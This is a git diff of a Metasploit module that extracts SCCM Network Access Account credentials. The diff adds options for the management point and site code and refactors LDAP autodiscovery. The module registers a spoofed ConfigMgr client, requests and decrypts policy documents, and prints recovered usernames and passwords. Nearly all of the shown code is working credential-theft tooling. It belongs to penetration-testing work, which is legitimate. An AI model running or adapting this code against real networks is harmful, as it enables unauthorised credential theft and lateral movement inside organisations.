diff --git a/modules/auxiliary/admin/sccm/get_naa_creds.rb b/modules/auxiliary/admin/sccm/get_naa_creds.rb
index 911cfdd73abb0..ed52933e10f20 100755
--- a/modules/auxiliary/admin/sccm/get_naa_creds.rb
+++ b/modules/auxiliary/admin/sccm/get_naa_creds.rb
@@ -24,9 +24,12 @@ def initialize(info = {})
This requires a computer account, which can be added using the samr_account module.
'Author' => [
+ 'xpn', # Initial research
+ 'skelsec', # Initial obfuscation port
'smashery' # module author
'References' => [
+ ['URL', 'https://blog.xpnsec.com/unobfuscating-network-access-accounts/'],
['URL', 'https://github.com/Mayyhem/SharpSCCM'],
['URL', 'https://github.com/garrettfoster13/sccmhunter']
@@ -40,9 +43,12 @@ def initialize(info = {})
+ OptAddressRange.new('RHOSTS', [ false, 'The domain controller (for autodiscovery). Not required if providing a management point and site code' ]),
+ OptPort.new('RPORT', [ false, 'The LDAP port of the domain controller (for autodiscovery). Not required if providing a management point and site code', 389 ]),
OptString.new('COMPUTER_USER', [ true, 'The username of a computer account' ]),
OptString.new('COMPUTER_PASS', [ true, 'The password of the provided computer account' ]),
- OptString.new('MANAGEMENT_POINT', [ false, 'The management point to use' ]),
+ OptString.new('MANAGEMENT_POINT', [ false, 'The management point (SCCM server) to use' ]),
+ OptString.new('SITE_CODE', [ false, 'The site code to use on the management point' ]),
@@ -59,27 +65,6 @@ def fail_with_ldap_error(message)
def find_management_point
- raw_objects = @ldap.search(base: @base_dn, filter: '(objectclass=mssmsmanagementpoint)', attributes: ['*'])
- return nil unless raw_objects.any?
- raw_obj = raw_objects.first
- raw_objects.each do |ro|
- print_status("Found Management Point: #{ro[:dnshostname].first} (Site code: #{ro[:mssmssitecode].first})")
- end
- if raw_objects.length > 1
- print_warning("Found more than one Management Point. Using the first (#{raw_obj[:dnshostname].first})")
- end
- obj = {}
- obj[:rhost] = raw_obj[:dnshostname].first
- obj[:sitecode] = raw_obj[:mssmssitecode].first
- obj
- end
- def run
ldap_connect do |ldap|
@@ -95,52 +80,81 @@ def run
@ldap = ldap
+ raw_objects = @ldap.search(base: @base_dn, filter: '(objectclass=mssmsmanagementpoint)', attributes: ['*'])
+ return nil unless raw_objects.any?
- mp = datastore['MANAGEMENT_POINT']
- if mp.blank?
- begin
- mp = find_management_point
- fail_with(Failure::NotFound, 'Failed to find management point') unless mp
- rescue ::IOError => e
- fail_with(Failure::UnexpectedReply, e.message)
- end
+ raw_obj = raw_objects.first
+ raw_objects.each do |ro|
+ print_good("Found Management Point: #{ro[:dnshostname].first} (Site code: #{ro[:mssmssitecode].first})")
- key, cert = generate_key_and_cert('ConfigMgr Client')
- http_opts = {
- 'rhost' => mp[:rhost],
- 'rport' => 80,
- 'username' => datastore['COMPUTER_USER'],
- 'password' => datastore['COMPUTER_PASS'],
- 'headers' => {
- 'User-Agent' => 'ConfigMgr Messaging HTTP Sender',
- 'Accept-Encoding' => 'gzip, deflate',
- 'Accept' => '*/*',
- 'Connection' => 'Keep-Alive'
- }
- }
+ if raw_objects.length > 1
+ print_warning("Found more than one Management Point. Using the first (#{raw_obj[:dnshostname].first})")
+ end
- sms_id = register_request(http_opts, mp, key, cert)
- duration = 5
- print_status("Waiting #{duration} seconds for SCCM DB to update...")
- sleep(duration)
- naa_policy_url = get_policies(http_opts, mp, key, cert, sms_id)
- decrypted_policy = request_policy(http_opts, naa_policy_url, sms_id, key)
- results = get_creds_from_policy_doc(decrypted_policy)
+ obj = {}
+ obj[:rhost] = raw_obj[:dnshostname].first
+ obj[:sitecode] = raw_obj[:mssmssitecode].first
+ obj
+ rescue Errno::ECONNRESET
+ fail_with(Failure::Disconnected, 'The connection was reset.')
+ rescue Rex::ConnectionError => e
+ fail_with(Failure::Unreachable, e.message)
+ rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e
+ fail_with(Failure::NoAccess, e.message)
+ rescue Net::LDAP::Error => e
+ fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
+ end
+ end
- results.each do |username, password|
- print_good("Found valid NAA creds: #{username}:#{password}")
+ def run
+ management_point = datastore['MANAGEMENT_POINT']
+ site_code = datastore['SITE_CODE']
+ if management_point.blank? != site_code.blank?
+ fail_with(Failure::BadConfig, 'Provide both MANAGEMENT_POINT and SITE_CODE, or neither (to perform autodiscovery)')
+ end
+ if management_point.blank?
+ begin
+ result = find_management_point
+ fail_with(Failure::NotFound, 'Failed to find management point') unless result
+ management_point = result[:rhost]
+ site_code = result[:site_code]
+ rescue ::IOError => e
+ fail_with(Failure::UnexpectedReply, e.message)
- rescue Errno::ECONNRESET
- fail_with(Failure::Disconnected, 'The connection was reset.')
- rescue Rex::ConnectionError => e
- fail_with(Failure::Unreachable, e.message)
- rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e
- fail_with(Failure::NoAccess, e.message)
- rescue Net::LDAP::Error => e
- fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
+ key, cert = generate_key_and_cert('ConfigMgr Client')
+ http_opts = {
+ 'rhost' => management_point,
+ 'rport' => 80,
+ 'username' => datastore['COMPUTER_USER'],
+ 'password' => datastore['COMPUTER_PASS'],
+ 'headers' => {
+ 'User-Agent' => 'ConfigMgr Messaging HTTP Sender',
+ 'Accept-Encoding' => 'gzip, deflate',
+ 'Accept' => '*/*'
+ }
+ }
+ sms_id = register_request(http_opts, management_point, key, cert)
+ duration = 5
+ print_status("Waiting #{duration} seconds for SCCM DB to update...")
+ sleep(duration)
+ naa_policy_url = get_policies(http_opts, management_point, site_code, key, cert, sms_id)
+ decrypted_policy = request_policy(http_opts, naa_policy_url, sms_id, key)
+ results = get_creds_from_policy_doc(decrypted_policy)
+ results.each do |username, password|
+ print_good("Found valid NAA creds: #{username}:#{password}")
+ end
def request_policy(http_opts, policy_url, sms_id, key)
@@ -182,7 +196,7 @@ def request_policy(http_opts, policy_url, sms_id, key)
if key_encryption_alg == Rex::Proto::CryptoAsn1::OIDs::OID_RSAES_OAEP.value
decrypted_key = key.private_decrypt(encrypted_rsa_key, OpenSSL::PKey::RSA::PKCS1_OAEP_PADDING)
- fail_with(Failure::UnexpectedReply, "Unexpected key encryption routine: #{key_encryption_alg}")
+ fail_with(Failure::UnexpectedReply, "Key encryption routine is currently unsupported: #{key_encryption_alg}")
cea = cms_envelope[:encrypted_content_info][:content_encryption_algorithm]
@@ -202,20 +216,19 @@ def request_policy(http_opts, policy_url, sms_id, key)
decrypted = cipher.update(body) + cipher.final
- fail_with(Failure::UnexpectedReply, "Unsupported decryption routine: #{cea[:algorithm].value}")
+ fail_with(Failure::UnexpectedReply, "Decryption routine is currently unsupported: #{cea[:algorithm].value}")
- def get_policies(http_opts, mp, key, cert, sms_id)
+ def get_policies(http_opts, management_point, site_code, key, cert, sms_id)
computer_user = datastore['COMPUTER_USER'].delete_suffix('$')
fqdn = "#{computer_user}.#{datastore['DOMAIN']}"
hex_pub_key = make_ms_pubkey(cert.public_key)
guid = SecureRandom.uuid.upcase
sent_time = Time.now.utc.iso8601
- site_code = mp[:sitecode]
- sccm_host = mp[:rhost].downcase
+ sccm_host = management_point.downcase
request_assignments = "GUID:#{sms_id}#{fqdn}#{computer_user}SMS:#{site_code}\x00"
body_length = request_assignments.bytes.length
@@ -272,7 +285,7 @@ def make_ms_pubkey(pub_key)
- def register_request(http_opts, mp, key, cert)
+ def register_request(http_opts, management_point, key, cert)
pub_key = cert.to_der.unpack('H*')[0].upcase
computer_user = datastore['COMPUTER_USER'].delete_suffix('$')
@@ -289,7 +302,7 @@ def register_request(http_opts, mp, key, cert)
body_length = rr_utf16.length
rr_utf16 << "\r\n"
- header = "{00000000-0000-0000-0000-000000000000}{5DD100CD-DF1D-45F5-BA17-A327F43465F8}0httpSyncdirect:#{computer_user}:SccmMessaging#{sent_time}#{computer_user}mp:MP_ClientRegistrationMP_ClientRegistration#{mp[:rhost].downcase}60000"
+ header = "{00000000-0000-0000-0000-000000000000}{5DD100CD-DF1D-45F5-BA17-A327F43465F8}0httpSyncdirect:#{computer_user}:SccmMessaging#{sent_time}#{computer_user}mp:MP_ClientRegistrationMP_ClientRegistration#{management_point.downcase}60000"
message = Rex::MIME::Message.new
message.bound = 'aAbBcCdDv1234567890VxXyYzZ'